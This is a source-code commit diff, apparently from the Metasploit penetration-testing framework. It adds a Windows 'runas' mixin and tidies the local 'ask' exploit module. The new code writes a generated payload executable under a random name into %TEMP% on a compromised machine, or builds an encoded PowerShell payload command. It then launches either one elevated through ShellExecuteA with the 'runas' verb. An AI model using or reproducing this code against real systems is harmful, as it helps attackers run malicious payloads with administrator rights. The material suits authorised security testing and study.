Tidy up

Meatballs1 · Meatballs1 · commit 7b2f0a64fc1b · 2014-03-22T18:07:57.000Z
diff --git a/lib/msf/core/post/windows.rb b/lib/msf/core/post/windows.rb
@@ -9,6 +9,7 @@ module Msf::Post::Windows
   require 'msf/core/post/windows/process'
   require 'msf/core/post/windows/railgun'
   require 'msf/core/post/windows/registry'
+  require 'msf/core/post/windows/runas'
   require 'msf/core/post/windows/services'
   require 'msf/core/post/windows/shadowcopy'
   require 'msf/core/post/windows/user_profiles'
diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
@@ -0,0 +1,40 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/powershell'
+require 'msf/core/exploit/exe'
+
+module Msf::Post::Windows::Runas
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Powershell
+
+  def execute_exe(filename=nil, path=nil, upload=nil)
+    exe_payload = generate_payload_exe
+    payload_filename = filename || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    payload_path = path || get_env('TEMP')
+    cmd_location = "#{payload_path}\\#{payload_filename}"
+
+    if upload
+      print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
+      write_file(cmd_location, exe_payload)
+    else
+      print_error("No Upload Path!")
+      return
+    end
+
+    command = cmd_location
+    shell_exec(command, nil)
+  end
+
+  def execute_psh
+    command,args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}"
+    shell_exec(command,args)
+  end
+
+  def shell_exec(command, args)
+    print_status("Executing elevated command!")
+    session.railgun.shell32.ShellExecuteA(nil, "runas", command, args, nil, 5)
+  end
+end
+
diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
@@ -38,7 +38,7 @@ def initialize(info={})
 
     register_options([
       OptString.new("FILENAME", [ false, "File name on disk"]),
-      OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
+      OptString.new("PATH", [ false, "Location on disk, %TEMP% used if not set" ]),
       OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
       OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
     ])
@@ -64,7 +64,7 @@ def exploit
     #
     case datastore["TECHNIQUE"]
     when "EXE"
-      execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])
+      execute_exe(datastore["FILENAME"], datastore["PATH"], datastore["UPLOAD"])
     when "PSH"
       execute_psh
     end
